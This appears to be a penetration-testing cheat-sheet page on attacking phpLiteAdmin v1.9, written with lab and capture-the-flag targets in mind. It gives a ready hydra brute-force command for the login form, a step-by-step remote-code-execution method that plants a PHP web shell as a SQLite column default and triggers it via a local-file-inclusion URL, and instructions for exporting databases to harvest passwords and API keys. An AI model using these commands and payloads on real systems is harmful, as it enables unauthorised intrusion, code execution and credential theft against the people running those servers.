search
githubEdit

phpLiteAdmin

phpLiteAdmin v1.9 – web UI for SQLite databases. Often found under /db/ on HTTPS virtual hosts.

Common path: https://TARGET/db/ or https://TARGET.htb/db/

hashtag
Discovery

  • Directory bust HTTPS (e.g. gobuster dir -k -u https://TARGET -w ... or feroxbuster).

  • Nikto may report: /db/: This might be interesting, cookie flags (PHPSESSID without secure/httponly).

  • PHP error on page can leak path: e.g. Warning: rand() expects parameter 2 to be integer, float given in /var/www/ssl/db/index.php on line 114.

hashtag
Default / weak credentials

Username
Password

admin

(often default or weak; try admin, password123, or brute force)

Brute force (HTTPS POST form):

hydra -l admin -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt TARGET_IP https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -t 3

Reference: Acunetix – phpLiteAdmin default passwordarrow-up-right

hashtag
RCE: Create PHP database + LFI

If you can create a SQLite database and if the server has an LFI that can include files from a path where the DB is stored (e.g. /var/tmp/):

  1. Log in to phpLiteAdmin.

  2. Create a new database named shell.php or d.php (extension must be .php).

  3. Create a table with one TEXT column and set the default value to PHP code. Use double quotes in the payload because this web app uses single quotes in the insertion command: <?php system($_REQUEST["cmd"]); ?>

  4. Example: table name d, column d type TEXT default <?php system($_REQUEST["cmd"]); ?> Resulting SQL: CREATE TABLE 'd' ('d' TEXT default '<?php system($_REQUEST["cmd"]); ?>')

  5. Include the DB file via LFI (adjust path to match server; e.g. DB path /var/tmp/): https://TARGET/manage.php?notes=/validNote/../var/tmp/d.php&cmd=id

Exploit walkthrough: https://github.com/chacka0101/exploits/blob/master/24044.txt

hashtag
Export DB as CSV

You can export the SQLite database as CSV from the UI. Use the export view:

https://TARGET/db/index.php?view=export

Exported tables may contain credentials (e.g. users, sessions, config). Download or view the CSV and search for passwords, API keys, or other sensitive data. The export may also leak paths or PHP notices in the output (e.g. Undefined index: single_table in index.php), which can help with further exploitation.

PreviousHaraka SMTPNextCamaleon CMS

Last updated